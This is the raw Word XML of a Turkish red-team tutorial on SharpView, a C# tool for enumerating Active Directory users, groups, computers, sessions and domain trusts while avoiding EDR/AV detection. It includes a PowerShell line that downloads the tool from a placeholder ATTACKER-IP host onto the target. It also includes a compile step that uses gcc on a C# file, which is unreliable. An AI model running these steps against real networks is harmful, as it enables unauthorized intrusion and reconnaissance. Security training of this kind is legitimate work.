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A5D2" w14:textId="06C021E5" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SharpView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">, Active Directory ortamlarında bilgi toplamak için kullanılan, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C# ile yazılmış</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>PowerView’in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> .NET tabanlı alternatifidir. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Red</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Team operasyonlarında, iç ağda kullanıcılar, gruplar, bilgisayarlar ve ilişkiler hakkında bilgi edinmek için tercih edilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9833C5" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> gerektirmeyen yapısıyla, EDR ve AV tespitlerinden kaçmak için uygundur. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> engeli olan ortamlarda etkin şekilde kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842D3B3" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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1D75DD28" w14:textId="664BE2A5" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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Bu Aracın Özellikleri Nelerdir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB20ABE" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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Kullanıcı, Grup, Bilgisayar Bilgisi Toplama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4252F23D" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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Kerberos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Delegation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ve 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Session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Enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0323F87D" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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Domain 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Trust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Haritalama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16007D39" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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PowerShell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Olmadan Çalışma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0B4D3" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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Active Directory 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Query’leri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.NET üzerinden gönderilir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B5C737" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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PowerView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komutlarının çoğunun karşılığı vardır</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8442C" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731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C# 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binary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olarak kullanılabilir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E4A19" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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</w:p>
    <w:p w14:paraId="0ACABAC5" w14:textId="1F781D71" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731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</w:pP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SharpView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Aracını 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>Kali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sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux’tan Windows Hedefte Kullanma Adımları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED671B" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731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3C3AAFBF" w14:textId="77777777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1: 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Kali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Üzerinden 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SharpView’u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Klonlayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D895E" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>clone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://github.com/SharpSuite/SharpView.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4707CA18" w14:textId="74704CED" w:rsidR="007F3392" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>SharpView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E30F61" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242BD02D" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203CBA77" w14:textId="77777777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2: Projeyi Derlenmiş Olarak Edinin (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Binary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2E1D2E60" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>SharpView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> (C# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>) dosyası olarak gelir. Derlenmiş hali yoksa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466585E1" w14:textId="29801B8E" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">86_64-w64-mingw32-gcc </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>SharpView.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o SharpView.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ABE849" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B4458E2" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2262BF95" w14:textId="77777777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3CB52F4" w14:textId="77777777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24B9CA1" w14:textId="77777777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339BCC00" w14:textId="42780B05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3: Dosyayı Hedef Windows Ortama Aktarın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF5CFD" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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02ABB061" w14:textId="79C48FD8" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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Komut (örnek HTTP sunucusu başlatma):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BD82AE" w14:textId="0182A6F0" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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gramStart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python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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8080</w:t>
      </w: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BD9A2F7" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr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color w:val="0E0E0E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Hedef sistemde (örneğin cmd.exe) şu komutla indirilir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30300617" w14:textId="575C3EEA" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Invoke-WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="005A6731">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="tr-TR"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>http://ATTACKER-IP:8080/SharpView.exe -OutFile SharpView.exe</w:t>
        </w:r>
      </w:hyperlink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"</w:t>
      </w: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78A1ADF" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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492081AE" w14:textId="77777777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 Adım 4: Hedef Windows Sistem Üzerinde Komutları Çalıştırın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319273F1" w14:textId="3AFD7866" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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SharpView.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Get-NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1B737BD9" w14:textId="6357D044" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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3ADDB358" wp14:editId="42AB6CD2">
            <wp:extent cx="3721100" cy="749300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1604455957" name="Resim 1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55957" name="Resim 1" descr="metin, yazı tipi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27C5" w14:textId="77777777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03758E55" w14:textId="3BCFEE99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5: Grup Üyelerini Görüntüleyin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943DE52" w14:textId="3B2FF96C" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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SharpView.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Get-NetGroupMember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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GroupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Admins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"</w:t>
      </w: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6DCD97F1" w14:textId="087E97BA" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B8F73E3" wp14:editId="2E1913C5">
            <wp:extent cx="4267200" cy="812800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="169331758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17586" name="Resim 16933175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1378" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A673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</w:p>
    <w:p w14:paraId="49DA5610" w14:textId="77777777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6: Tüm Domain Bilgisayarlarını Listeleyin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B8232" w14:textId="7FEC3D54" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731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SharpView.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Get-NetComputer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731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6CA4885F" w14:textId="28B8B60A" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="512C5B86" wp14:editId="39A166A9">
            <wp:extent cx="3225800" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1710005347" name="Resim 3" descr="metin, yazı tipi, ekran görüntüsü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05347" name="Resim 3" descr="metin, yazı tipi, ekran görüntüsü, grafik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1EFED" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1D5D03" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2676956E" w14:textId="77777777" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360EBC8E" w14:textId="77777777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Adım 7: Oturumları Göster (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Session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Enum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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BC780" w14:textId="3A5A0D04" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">SharpView.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Get-NetSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DC896" w14:textId="14358872" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C044BE" wp14:editId="69D2E0EA">
            <wp:extent cx="3302000" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="231805526" name="Resim 4" descr="metin, yazı tip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5526" name="Resim 4" descr="metin, yazı tipi, ekran görüntüsü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C083" w14:textId="77777777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</w:p>
    <w:p w14:paraId="101E404A" w14:textId="43A8D3F9" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731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Adım 8: Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>Trust’ları</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica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Göster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE6E59E" w14:textId="1C5E3F41" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">SharpView.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Get-NetDomainTrust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F56E6" w14:textId="1F0DCCE8" w:rsidR="005A6731" w:rsidRPr="005A6731" w:rsidRDefault="005A6731" w:rsidP="005A6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6731">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7AA849" wp14:editId="16408130">
            <wp:extent cx="5760720" cy="471805"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="750117709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17709" name="Resim 7501177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731" w:rsidRPr="005A6731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72485"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78F4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31"/>
    <w:rsid w:val="00411558"/>
    <w:rsid w:val="005A6731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BA708"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4E9EF89-16DF-C34D-952B-79E603C82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A6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5A6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A6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5A6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A6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A67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A67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A67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A67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A6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5A6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5A6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5A673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A673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A673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A673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A673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A673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A67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A6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A67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A6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A67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A673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A673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A673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A6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A673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A673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A67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5A6731"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p2">
    <w:name w:val="p2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="005A67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5A673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A6731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VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="005A6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32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ATTACKER-IP:8080/SharpView.exe%20-OutFile%20SharpView.ex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2025-08-01T12:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-01T13:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>